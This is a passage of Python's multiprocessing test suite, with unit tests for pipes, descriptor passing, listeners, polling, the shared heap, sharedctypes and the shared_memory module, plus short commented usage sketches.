@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by the parent
# process immediately after the child is spawned. On Windows this
# sometimes failed on old versions because child_conn would be
# closed before the child got a chance to duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
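# With every descriptor below 256 already occupied, the handle received
# below is guaranteed to land on an fd >= 256, which is the situation
# test_large_fd_transfer (issue #11657) exercises.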
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle. This causes
# ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
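# Illustrative note (not part of the test suite): when multiprocessing.reduction
# is available, Connection objects can themselves be pickled and sent through
# an existing Connection, and the receiver gets a working duplicate.  A minimal
# sketch (helper names are examples only; __main__ guard omitted for brevity):
#
#   def worker(conn):
#       forwarded = conn.recv()          # receives a Connection object
#       forwarded.send('hello over the forwarded connection')
#
#   a, b = multiprocessing.Pipe()
#   x, y = multiprocessing.Pipe()
#   p = multiprocessing.Process(target=worker, args=(b,))
#   p.start()
#   a.send(y)                            # the Connection itself is pickled
#   print(x.recv())
#   p.join()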
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
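# Illustrative sketch (not part of the test suite): multiprocessing.sharedctypes
# can place a ctypes Structure such as _Foo in shared memory; with the default
# lock a synchronized wrapper exposing the fields and get_lock() is returned:
#
#   from multiprocessing.sharedctypes import Value
#
#   foo = Value(_Foo, 3, 2.0, 2 ** 33)   # x=3, y=2.0, z=2**33
#   with foo.get_lock():
#       foo.x *= 2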
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def _new_shm_name(self, prefix):
# Add a PID to the name of a POSIX shared memory object to allow
# running multiprocessing tests (test_multiprocessing_fork,
# test_multiprocessing_spawn, etc) in parallel.
return prefix + str(os.getpid())
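# Illustrative sketch (not part of the test suite): the SharedMemory lifecycle
# exercised below is create -> attach -> close -> unlink:
#
#   from multiprocessing import shared_memory
#
#   creator = shared_memory.SharedMemory(create=True, size=16)
#   creator.buf[:5] = b'hello'
#   attached = shared_memory.SharedMemory(creator.name)    # attach by name
#   assert bytes(attached.buf[:5]) == b'hello'
#   attached.close()
#   creator.close()
#   creator.unlink()        # actually releases the segment (POSIX)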
@unittest.skipIf(sys.platform == "win32", "test is broken on Windows")
def test_shared_memory_basics(self):
name_tsmb = self._new_shm_name('test01_tsmb')
sms = shared_memory.SharedMemory(name_tsmb, create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, name_tsmb)
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory(name_tsmb)
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory(name_tsmb, size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating a shared memory segment with a negative size should fail
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching to a shared memory segment without a name should fail
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test that the shared memory segment is created properly when
# _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = [self._new_shm_name('test01_fn'), self._new_shm_name('test02_fn')]
# Prepend NAME_PREFIX, which can be '/psm_' or 'wnsm_', necessary
# because some POSIX-compliant systems require the name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
name_dblunlink = self._new_shm_name('test01_dblunlink')
sms_uno = shared_memory.SharedMemory(
name_dblunlink,
create=True,
size=5000
)
with self.assertRaises(FileNotFoundError):
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory(name_dblunlink)
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
name_tsmb,
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory(name_tsmb)
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
# Test creating a shared memory segment with negative size
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=-1)
# Test creating a shared memory segment with size 0
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=0)
# Test creating a shared memory segment without size argument
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True)
def test_shared_memory_across_processes(self):
# bpo-40135: don't specify the shared memory block's name, to avoid
# failures when multiprocessing tests are run in parallel.
sms = shared_memory.SharedMemory(create=True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals,
# maintain its connection with the current process, and succeed when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on the Windows platform; shared
# memory will only be released once the final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
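# Illustrative sketch (not part of the test suite): SharedMemoryManager is the
# context-manager friendly way to get blocks that are released automatically
# on shutdown, as the test above verifies:
#
#   from multiprocessing.managers import SharedMemoryManager
#
#   with SharedMemoryManager() as smm:
#       shm = smm.SharedMemory(size=128)        # freed when the block exits
#       sl = smm.ShareableList(range(5))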
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
name_duplicate = self._new_shm_name('test03_duplicate')
sl_copy = shared_memory.ShareableList(sl, name=name_duplicate)
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual(name_duplicate, sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
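# Illustrative sketch (not part of the test suite): ShareableList stores a
# fixed-length sequence of int/float/bool/str/bytes/None values in shared
# memory; items can be replaced in place but the list cannot grow:
#
#   from multiprocessing import shared_memory
#
#   sl = shared_memory.ShareableList([1, 2.0, 'three'])
#   peer = shared_memory.ShareableList(name=sl.shm.name)   # second handle
#   peer[0] = 42
#   assert sl[0] == 42
#   peer.shm.close()
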